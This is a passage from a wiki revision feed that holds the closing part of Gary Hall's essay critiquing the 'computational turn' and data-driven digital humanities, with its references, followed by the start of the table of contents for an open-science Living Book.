Software Studies Initiative offer another. Now, there is a long history of critical engagement within the humanities with ideas of the visual, the image, the spectacle, the spectator and so on: not just in critical theory, but also in cultural studies, women’s studies, media studies, film and television studies. Such a history of critical engagement stretches back to Guy Debord’s influential 1967 work, ''The Society of the Spectacle'', and beyond. For example, in his introduction to a 1995 book edited with Lynn Cooke, ''Visual Display: Culture Beyond Appearances'', Peter Wollen writes that an excess of visual display within culture has 'the effect of concealing the truth of the society that produces it, providing the viewer with an unending stream of images that might best be understood, not simply detached from a real world of things, as Debord implied, but as effacing any trace of the symbolic, condemning the viewer to a world in which we can see everything but understand nothing—allowing us viewer-victims, in Debord’s phrase, only &amp;quot;a random choice of ephemera&amp;quot;’ (1995: 9). It can come as something of a surprise, then, to discover that this humanities tradition in which ideas of the visual are engaged critically appears to have had comparatively little impact on the current enthusiasm for data visualisation that is so prominent an aspect of the turn toward data-intensive scholarship. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Of course, this (at times explicit) repudiation of criticality could be precisely what makes certain aspects of the digital humanities so seductive for many at the moment. Exponents of the computational turn can be said to be endeavouring to avoid conforming to accepted (and often moralistic) conceptions of politics that have been decided in advance, including those that see it only in terms of power, ideology, race, gender, class, sexuality, ecology, affect etc. Refusing to [http://www.uchicago.edu/research/jnl-crit-inq/issues/v30/30n2.Latour.html ‘go through the motions of a critical avant-garde’], to borrow the words of Bruno Latour (2004), they often position themselves as responding to what is perceived as a fundamentally new cultural situation, and to the challenge it represents to our traditional methods of studying culture, by avoiding conventional theoretical manoeuvres and by experimenting with the development of fresh methods and approaches for the humanities instead. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, for instance, sees the sheer scale and dynamics of the contemporary new media landscape as presenting the usually accepted means of studying culture that were dominant for so much of the 20th century – the kinds of theories, concepts and methods appropriate to producing close readings of a relatively small number of texts – with a significant practical and conceptual challenge. In the past, ‘[http://lab.softwarestudies.com/2010/03/cultural-analytics-lecture-by-manovich.html cultural theorists and historians could generate theories and histories] based on small data sets (for instance, “classical Hollywood cinema”, “Italian Renaissance”, etc.) But how can we track “global digital cultures”, with their billions of cultural objects, and hundreds of millions of contributors’, he asks (Manovich, 2010)? Three years ago Manovich was already describing the ‘numbers of people participating in social networks, sharing media, and creating user-generated content’ as simply ‘astonishing’: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.hpcwire.com/features/The_Next_Big_Thing_in_Humanities_Arts_and_Social_Science_Computing_Cultural_Analytics.html MySpace, for example,] claims 300 million users. Cyworld, a Korean site similar to MySpace, claims 90 percent of South Koreans in their 20s and 25 percent of that country's total population (as of 2006) use it. Hi5, a leading social media site in Central America has 100 million users and Facebook, 14 million photo uploads daily. The number of new videos uploaded to YouTube every twenty-four hours (as of July 2006): 65,000. (Manovich in Franklin &amp;amp;amp; Rodriguez’G, 2008)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The solution Manovich proposes to this ‘data deluge’ is to turn to the very computers, databases, software and vast amounts of born-digital networked cultural content that are causing the problem in the first place, and to use them to help develop new methods and approaches adequate to the task at hand. This is where what he calls Cultural Analytics comes in. [http://virtueelplatform.nl/kennis/analyzing-culture-in-the-21st-century/ ‘The key idea of Cultural Analytics] is the use of computers to automatically analyze cultural artefacts in visual media, extracting large numbers of features that characterize their structure and content’ (Manovich in Kerssens &amp;amp;amp; Dekker, 2009); and what is more, to do so not just with regard to the culture of the past, but also with that of the present. To this end, Manovich (not unlike the Google technology company) calls for as much of culture as possible to be made available in external, digital form: [http://virtueelplatform.nl/kennis/analyzing-culture-in-the-21st-century/ ‘not only the exceptional but also the typical]; not only the few cultural sentences spoken by a few &amp;quot;great man&amp;quot; [sic] but the patterns in all cultural sentences spoken by everybody else’ (Manovich in Kerssens &amp;amp;amp; Dekker, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In a series of posts on his Found History blog, Tom Scheinfeldt, managing director at the Center for History and New Media at George Mason University, positions such developments in terms of a shift from a concern with theory and ideology to a [http://www.foundhistory.org/2008/03/13/sunset-for-ideology-sunrise-for-methodology/ concern with methodology] (2008). In this respect there may well be a degree of [http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/ ‘relief in having escaped the culture wars of the 1980s’] – for those in the US especially – as a result of this move ‘into the space of methodological work’ (Croxall, 2010) and what Scheinfeldt reportedly dubs [http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;hp=&amp;amp;pagewanted=all ‘the post-theoretical age’] (cited in P. Cohen, 2010). The problem, though, is that without such reflexive critical thinking and theories many of those whose work forms part of this computational turn find it difficult to articulate exactly what the point of what they are doing is, as Scheinfeldt readily acknowledges (2010a). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Take one of the projects mentioned earlier: the attempt by [http://victorianbooks.org Dan Cohen and Fred Gibbs] to text-mine all the books published in English in the Victorian age (or at least those digitized by Google). Among other things, this allows Cohen and Gibbs to show that use of the word ‘revolution’ in book titles of the period spiked around [http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader ‘the French Revolution and the revolutions of 1848’] (D. Cohen, 2010). But what argument are they trying to make with this calculation? What is it we are able to learn as a result of this use of computational power on their part that we did not know already and could not have discovered without it ([http://www.foundhistory.org/2010/05/12/wheres-the-beef-does-digital-humanities-have-to-answer-questions/ Scheinfeldt], 2008)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In an explicit response to Cohen and Gibbs’s project, Scheinfeldt suggests that the problem of theory, or the lack of it, may actually be a question of scale: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader It expects something of the scale of humanities scholarship] which I’m not sure is true anymore: that a single scholar—nay, every scholar—working alone will, over the course of his or her lifetime ... make a fundamental theoretical advance to the field. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Increasingly, this expectation is something peculiar to the humanities. ...it required the work of a generation of mathematicians and observational astronomers, gainfully employed, to enable the eventual “discovery” of Neptune... Since the scientific revolution, most theoretical advances play out over generations, not single careers. (Scheinfeldt, 2010b)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Now, it is absolutely important that we as scholars experiment with the new tools, methods and materials that digital media technologies create and make possible, in order to bring into play new forms of Foucauldian ''dispositifs'', or what Bernard Stiegler calls ''hypomnemata'', or what I am trying to think in terms of [http://garyhall.info media gifts]. I would include in this 'experimentation imperative’ techniques and methodologies drawn from computer science and other related fields, such as information visualisation, data mining and so forth. Nevertheless, there is something troubling about this kind of deferral of critical and self-reflexive theoretical questions to an unknown point in time, still possibly a generation away. After all, the frequent suggestion is that now is not the right time to be making any such decision or judgement, since we cannot yet know how humanists will eventually come to use these tools and data, and thus what data-driven scholarship may or may not turn out to be capable of, critically, politically, theoretically. One of the consequences of this deferral, however, is that it makes it extremely difficult to judge whether this postponement is indeed acting as a responsible, political and ethical opening to the (heterogeneity and incalculability of the) future, including the future of the humanities; or whether it is serving as an alibi for a naive and rather superficial form of scholarship instead ([https://dhs.stanford.edu/the-digital-humanities-as/the-digital-humanities-as-imagined-community/ Meeks], 2010). A form of scholarship moreover that, in uncritically and un-self-reflexively adopting techniques and methodologies drawn from computer science, can be seen as part of the larger shift in contemporary society which Lyotard associates with the widespread use of computers and databases, and with the exteriorization of knowledge in relation to the ‘knower’. As we have seen, it is a movement away from a concern with ideals, with what is right and just and true, and toward a concern to legitimate power by optimizing the system’s performance in instrumental, functional terms. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; All of this raises some rather significant and timely questions for the humanities. Is it merely a coincidence that such a turn toward science, computing and data-intensive research is gaining momentum at a time when the UK government is emphasizing the importance of the STEM subjects (science, technology, engineering and medicine) and withdrawing support and funding from the humanities? Or is one of the reasons all this is happening now due to the fact that the humanities, like the sciences themselves, are under pressure from government, business, management, industry and increasingly the media to prove they provide value for money in instrumental, functional, performative terms? Is the interest in computing a strategic decision on the part of some of those in the humanities? As the project of Cohen and Gibbs shows, one can get funding from the likes of Google (D. Cohen, 2010). In fact, in the summer of 2010 [http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;hp=&amp;amp;pagewanted=all ‘Google awarded $1 million to professors doing digital humanities research’] (P. Cohen, 2010). To what extent is the take-up of practical techniques and approaches from computing science providing some areas of the humanities with a means of defending (and refreshing) themselves in an era of global economic crisis and severe cuts to higher education, through the transformation of their knowledge and learning into quantities of information –- so-called ‘deliverables’? Can we even position the ‘computational turn’ as an event created to justify such a move on the part of certain elements within the humanities ([http://coventryuniversity.podbean.com/2010/11/09/open-software-and-digital-humanities-federica-frabetti/ Frabetti], 2010)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Where does all this leave us as far as this Living Book on open science is concerned? As the argument above hopefully demonstrates, it is clearly not enough just to attempt to reveal or recover the scientific truth about, say, the environment, to counter the disinformation of others involved in the likes of the Climategate controversy. Nor is it enough merely to make the scientific research openly accessible to the public. Equally, it is not satisfactory simply to make the information, data, and associated tools, techniques and resources freely available to those in the humanities, so they can collectively and collaboratively search, mine, map, graph, model, visualize, analyse and interpret it in new ways – including some that may make it less abstract and easier for the majority of those in society to understand and follow – and, in doing so, help bridge the gap between the ‘two cultures’. It is not so much that there is a lack of information, or access to the right kind of information, or information presented in the right kind of way to ensure that the message of the scientific research and data comes across effectively and efficiently. It is not even that there is too much information, too much white noise, as ‘Bifo’ et al call it (2009: 141-142). To be sure, as a [http://oxygen.mintel.com/sinatra/reports/display/id=479774 2010 Mintel report] showed – to stay with the example of climate change – most people in the UK already know what is happening to the environment. They are just suffering from Green Fatigue, they are bored with thinking about it and thus enacting a backlash against what they perceive as ‘extreme’ pressure from environmentalist groups. This is perhaps one reason why [http://www.independent.co.uk/environment/climate-change/green-fatigue-hits-campaign-to-reduce-carbon-footprint-2102585.html ‘the number of cars on UK roads has risen from just over 26million in 2005 to more than 31 million in 2009’] (Shields, 2010: 30). Yet to argue there is too much information rather risks implying that there is a proper amount of information, and what would that be?&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; So we might not want to go along with Gilles Deleuze and Felix Guattari when they contend that ‘we do not lack communication. On the contrary, we have too much of it’. But we might nevertheless agree when they argue that what we actually lack is creation: ‘We lack resistance to the present’ (1994: 108). In this respect, it is not just a case of supplying more scientific research and data; nor of making the research and data that has otherwise been closed, hidden, denied or suppressed openly available for free – by opening the already existing memory and databanks to the people, for example (which is what Lyotard ended by suggesting we do). It is also a case of creating work around the research and data that does not simply go along with the shift in the status and nature of knowledge that is currently taking place. As we have seen, it is a shift toward STEM subjects and away from the humanities; toward a concern with optimizing the social system’s performance in instrumental, functional terms, and away from a concern with questions of what is just and right; and toward an emphasis on openness, freedom and transparency, and away from what is capable of disrupting and disturbing society, and what, in remaining resistant to a culture of measurement and calculation, maintains a much needed element of inaccessibility, inefficiency, delay, error, antagonism, heterogeneity and dissensus within the system. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Can this Living Book on open science be considered one such a creation? And can this series of Living Books about Life be considered another? Are they instances of a resistance to the present? Or just more white noise? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; (The above is based on a paper presented at the Data Landscapes, AHRC network event, held in conjunction with the British Antarctic Survey at the University of Westminster, London, December 15, 2010. An earlier version of some of the material provided above appeared in Hall [2010]) &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''References''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Arthur, C. (2010), ‘Will Brussels Curb Google Guys’, ''The Guardian'', December 6. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; 'Bifo' Berardi, F., Jacquemet, M. and Vitali, G. (2009), ''Ethereal Shadows: Communications and Power in Contemporary Italy''. Brooklyn, New York: Autonomedia. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Bergman, M. K. (2001), ‘The Deep Web: Surfacing Hidden Value’, ''JEP: The Journal of Electronic Publishing'', vol.7, no.1, August. http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104.&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Birchall, C. (2011) 'There's Been Too Much Secrecy in this City&amp;quot;: The False Choice Between Secrecy and Transparency in US Politics,' ''Cultural Politics''&amp;amp;nbsp;7(1), March: 133-156.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;Birchall, C (2011b forthcoming) ‘Transparency, Interrupted: Secrets of the Left’, Between Transparency and Secrecy', Annual Review, ''Theory, Culture and Society, ''December.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Blair, T. (2010), ''A Journey''. London: Hutchinson. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Clinton, H. (2010), ‘Internet Freedom: The Prepared Text of U.S. of Secretary of State Hillary Rodham Clinton's speech, delivered at the Newseum in Washington, D.C., January 21. http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Cohen, D. (2010), ‘Searching for the Victorians’, ''Dan Cohen'', October 4. http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;amp;utm_medium=feed&amp;amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;amp;utm_content=Google+Reader. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Cohen, P. (2010) ‘Digital Keys for Unlocking the Humanities’ Riches’, ''The New York Times'', November 16. http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;amp;hp=&amp;amp;amp;pagewanted=all. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Croxall, B. (2010) response to Tanner Higgen, ‘Cultural Politics, Critique, and the Digital Humanities’, ''Gaming the System''. September 10. http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Deleuze G. and Guattari, F. (1988) ''A Thousand Plateaus: Capitalism and Schizophrenia''. London: Athlone. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Deleuze G. and Guattari, F. (1994), ''What is Philosophy?''. New York: Columbia University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fung, A., Graham, M., Weil, D. (2007), ''Full Disclosure: The Perils and Promise of Transparency''. Cambridge: Cambridge University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Frabetti, F. (2010) ‘Digital Again? The Humanities Between the Computational Turn and Originary Technicity’, talk given to the Open Media Group, Coventry School of Art and Design. November 9. http://coventryuniversity.podbean.com/2010/11/09/open-software-and-digital-humanities-federica-frabetti/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Franklin, K. D. and Rodriguez’G, K. (2008) ‘The Next Big Thing in Humanities, Arts and Social Science Computing: Cultural Analytics’,''HPC Wire''. July 29. http://www.hpcwire.com/features/The_Next_Big_Thing_in_Humanities_Arts_and_Social_Science_Computing_Cultural_Analytics.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gibbs, R. (2010), Presidential press secretary, cited in ‘White House condemns WikiLeaks' release’, ''MCNBC.com News'', November 28. http://www.msnbc.msn.com/id/40405589/ns/us_news-security. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2010a), ‘Open Data: Empowering the Empowered or Effective Data Use for Everyone?’, ''Gurstein’s Community Infomatics'', September, 2. http://gurstein.wordpress.com/2010/09/02/open-data-empowering-the-empowered-or-effective-data-use-for-everyone/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2010b), ‘Open Data (2): Effective Data Use’, ''Gurstein’s Community Infomatics'', September, 9. http://gurstein.wordpress.com/2010/09/09/open-data-2-effective-data-use/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2011), ‘Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide’, posting to the nettime mailing list, July, 5. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hall, G. (2010), 'We Can Know It For You: The Secret Life of Metadata', ''How We Became Metadata''. London: Institute for Modern and Contemporary Culture, University of Westminster. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Higgen, T. (2010) ‘Cultural Politics, Critique, and the Digital Humanities’, ''Gaming the System''. May 25. http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hindman, M. (2009), ''The Myth of Digital Democracy''. Princeton, NJ and Oxford: Princeton University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hoffman, M. (2010), ‘EFF Posts Documents Detailing Law Enforcement Collection of Data From Social Media Sites’, ''Electronic Frontier Foundation''. March 16. http://www.eff.org/deeplinks/2010/03/eff-posts-documents-detailing-law-enforcement. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Houghton, J. (2009) ‘Open Access - What are the Economic Benefits?: A Comparison of the United Kingdom, Netherlands and Denmark’, Centre for Strategic Economic Studies, Victoria University, Melbourne. http://www.knowledge-exchange.info/Admin/Public/DWSDownload.aspx?File=%2fFiles%2fFiler%2fdownloads%2fOA_What_are_the_economic_benefits_-_a_comparison_of_UK-NL-DK__FINAL_logos.pdf. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Jarvis, J. (2010), ‘Time For Citizens of the Internet to Stand Up’, ''The Guardian: MediaGuardian'', March 29. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; JISC (2009), ‘Press Release: Open Science - the future for research?, posting to the BOAI list, November 16. 2009. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Kerssens, N. and Dekker A. (2009), ‘Interview with Lev Manovich for Archive 2020’, ''Virtueel_ Platform''. http://www.virtueelplatform.nl/#2595. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Knouf, N. (2010), ‘The JJPS Extension: Presenting Academic Performance Information’, ''Journal of Journal Performance Studies'', Vol 1, No 1. Available at http://journalofjournalperformancestudies.org/journal/index.php/jjps/article/view/6/6. Accessed 20 June, 2010. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Latour, B (2004), ‘Why Has Critique Run Out of Steam? From Matters of Fact to Matters of Concern”’, ''Critical Inquiry'', Vol. 30, Number 2. http://www.uchicago.edu/research/jnl-crit-inq/issues/v30/30n2.Latour.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Liu, A. (2011) ‘Where is Cultural Criticism in the Digital Humanities’. Paper presented at the panel on ‘The History and Future of the Digital Humanities’” Modern Language Association convention, Los Angeles, January 7. http://liu.english.ucsb.edu/where-is-cultural-criticism-in-the-digital-humanities. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Lyotard, J-F. (1986), ''The Postmodern Condition: A Report on Knowledge''. Manchester: Manchester University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Lyotard, J.-F. (1991) ''The Inhuman: Reflections on Time''. Cambridge: Polity. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, L. (2010a) ‘Cultural Analytics Lectures by Manovich in UK (London and Swansea), March 8-9, 2010’, ''Software Studies Initiative''. March 8. http://lab.softwarestudies.com/2010/03/cultural-analytics-lecture-by-manovich.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, L. (2011) ‘Trending: The Promises and the Challenges of Big Social Data’,''Lev Manovich'', April 28: http://www.manovich.net/DOCS/Manovich_trending_paper.pdf. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Meeks, E. (2010), ‘The Digital Humanities as Imagined Community’, ''Digital Humanities Specialist''. September 14. https://dhs.stanford.edu/the-digital-humanities-as/the-digital-humanities-as-imagined-community/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Mintel report, ‘Energy Efficiency in the Home - UK - July 2010’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Murray, S. Choi, S., Hoey, J., Kendall, C., Maskalyk, J., and Palepu, A. (2008), ‘Open Science, Open Access and Open Source Software at ''Open Medicine''’, ''Open Medicine'', 2(1): e1–e3. http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/?tool=pmcentrez http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/pdf/OpenMed-02-e1.pdf??tool=pmcentrez &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Patterson, M. (2009), ‘Article-Level Metrics at PloS – Addition of Usage Data’, ''PLoS: Public Library of Science''. September 16. http://blogs.plos.org/plos/2009/09/article-level-metrics-at-plos-addition-of-usage-data/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Pubget (2010), ‘[BOAI] PLoS Launches Fast (Open) PDF Access with Pubget’, posted on the BOAI list by Peter Suber, March 8. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Poynder, R. (2010), ‘Interview With Jean-Claude Bradley: The Impact of Open Notebook Science’, ''Information Today'', September. http://www.infotoday.com/IT/sep10/Poynder.shtml. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2008), ‘Sunset for Ideology, Sunrise for Methodology?’, ''Found History'', March 13. http://www.foundhistory.org/2008/03/13/sunset-for-ideology-sunrise-for-methodology/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2010a) ‘Where’s the Beef?: Does Digital Humanities Have to Answer Questions?’, ''Found History'', March 13. http://www.foundhistory.org/2010/05/12/wheres-the-beef-does-digital-humanities-have-to-answer-questions/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2010b) response to Dan Cohen, ‘Searching for the Victorians’, ''Dan Cohen''. October 5. http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;amp;utm_medium=feed&amp;amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;amp;utm_content=Google+Reader. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Shields, R. (2010), ‘Green Fatigue Hits Campaign to Reduce Carbon Footprint’, ''The Independent'', October 10. http://www.independent.co.uk/environment/climate-change/green-fatigue-hits-campaign-to-reduce-carbon-footprint-2102585.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Sterling, B. (2005), ''Shaping Things''. Massachussetts: MIT. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Stolberg, S. G. (2009), ‘On First Day, Obama Quickly Sets a New Tone’”, ''The New York Times''. January 21. http://www.nytimes.com/2009/01/22/us/politics/22obama.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Swan, A. (2009), ‘Open Access and Open Data’, ''2nd NERC Data Management Workshop'', Oxford. February 17-18. http://eprints.ecs.soton.ac.uk/17424/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Swartz, A. (2010), ‘When is Transparency Useful?’ ''Aaron Swartz’s Raw Thought blog'', February 11. http://www.aaronsw.com/weblog/usefultransparency. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Vaidhyanathan, S. (2009), ‘The Googlization of Universities’, ''The NEA 2009 Almanac of Higher Education''. http://www.nea.org/assets/img/PubAlmanac/ALM_09_06.pdf &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Wark, M. (2004), ''A Hacker Manifesto''. Harvard: Harvard University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Westcott, S. (2009) ‘Global Warming: Brits Deny Humans are to Blame,’ ''The Express'', December 7. http://www.express.co.uk/posts/view/144551/Global-warming-Brits-deny-humans-are-to-blame &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The White House (2009), ‘Memorandum for the Heads of Executive Departments and Agencies: Transparency and Open Government’. January 21. http://www.whitehouse.gov/the_press_office/TransparencyandOpenGovernment/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Wollen, P. and Cooke, L. eds (1995), ''Visual Display: Culture Beyond Appearances''. Seattle: Bay Press.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=5506</id>
		<title>Digitize Me, Visualize Me, Search Me</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=5506"/>
		<updated>2013-11-12T08:57:26Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:LifetrackingCover1.jpg|right|318x450px|LifetrackingCover1.jpg]] Open Science and its Discontents &lt;br /&gt;
&lt;br /&gt;
[http://www.livingbooksaboutlife.org/books/ISBN_Numbers ISBN: 978-1-60785-267-4] &lt;br /&gt;
&lt;br /&gt;
''edited by'' [http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me/bio Gary Hall] __TOC__ &lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Introduction '''Introduction: White Noise: On the Limits of Openness (Living Book Mix)''']  ==&lt;br /&gt;
&lt;br /&gt;
One of the aims of the Living Books About Life series is to provide a 'bridge' or point of connection, translation, even interrogation and contestation, between the humanities and the sciences. Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &lt;br /&gt;
&lt;br /&gt;
The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from computer science and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are being increasingly used to produce new ways of approaching and understanding texts in the humanities - what is sometimes thought of as 'the digital humanities'. [http://www.livingbooksaboutlife.org/books/Open_science/Introduction (more...)] &lt;br /&gt;
&lt;br /&gt;
== Open Science  ==&lt;br /&gt;
&lt;br /&gt;
=== It’s An Open (Science), Open (Access), Open (Source), Open (Notebook) World  ===&lt;br /&gt;
&lt;br /&gt;
;[http://usefulchem.wikispaces.com/ Open Notebook Science ]&lt;br /&gt;
&lt;br /&gt;
;Patrick O. Brown, Michael B. Eisen, Harold Varmus&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0000036 Why PLoS Became a Publisher]&lt;br /&gt;
&lt;br /&gt;
;Sally Murray, Stephen Choi, John Hoey, Claire Kendall, James Maskalyk, and Anita Palepu&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/pdf/OpenMed-02-e1.pdf??tool=pmcentrez Open Science, Open Access and Open Source Software at ''Open Medicine'']&lt;br /&gt;
&lt;br /&gt;
=== Community Science  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=12873908}} &lt;br /&gt;
&lt;br /&gt;
;[http://www.psfk.com/2010/09/biocurious-a-community-lab-for-biotechnology.html BioCurious: A Community Lab for Biotechnology]&lt;br /&gt;
&lt;br /&gt;
;Richard Stallman&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0020047 Free Community Science and the Free Development of Science]&lt;br /&gt;
&lt;br /&gt;
=== 'This Revolution Will Be Digitized’: Online Tools for Open Science  ===&lt;br /&gt;
&lt;br /&gt;
;[http://biogang.openwetware.org/ Biogang]&lt;br /&gt;
&lt;br /&gt;
;Bill Hooker&amp;amp;nbsp; &lt;br /&gt;
:[http://3quarksdaily.blogs.com/3quarksdaily/2007/01/the_future_of_s.html The Future of Science is Open, Part 3: An Open Science World]&lt;br /&gt;
&lt;br /&gt;
;Chris Patil and Vivian Siegel&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2675795/ This Revolution Will Be Digitized: Online Tools for Radical Collaboration]&lt;br /&gt;
&lt;br /&gt;
=== Open Science Publishing  ===&lt;br /&gt;
&lt;br /&gt;
;Philip E. Bourne&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2877727/?tool=pmcentrez#pcbi.1000787-Hey1 What Do I Want from the Publisher of the Future?]&lt;br /&gt;
&lt;br /&gt;
;Cameron Neylon&amp;amp;nbsp; &lt;br /&gt;
:[http://pirsa.org/08090038/ Science in the Open/or/How I Learned to Stop Worrying and Love My Blog]&lt;br /&gt;
&lt;br /&gt;
== Open Knowledge  ==&lt;br /&gt;
&lt;br /&gt;
=== Access to Knowledge  ===&lt;br /&gt;
&lt;br /&gt;
;[http://okfn.org/ Open Knowledge Foundation]&lt;br /&gt;
&lt;br /&gt;
;Gaelle Krikorian and Amy Kapczynski, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://www.soros.org/initiatives/information/focus/access/articles_publications/publications/age-of-intellectual-property-20101110/age-of-intellectual-property-20101110.pdf ''Access to Knowledge In the Age of Intellectual Property'']&lt;br /&gt;
&lt;br /&gt;
=== New Models for Open Sharing and Open Research  ===&lt;br /&gt;
&lt;br /&gt;
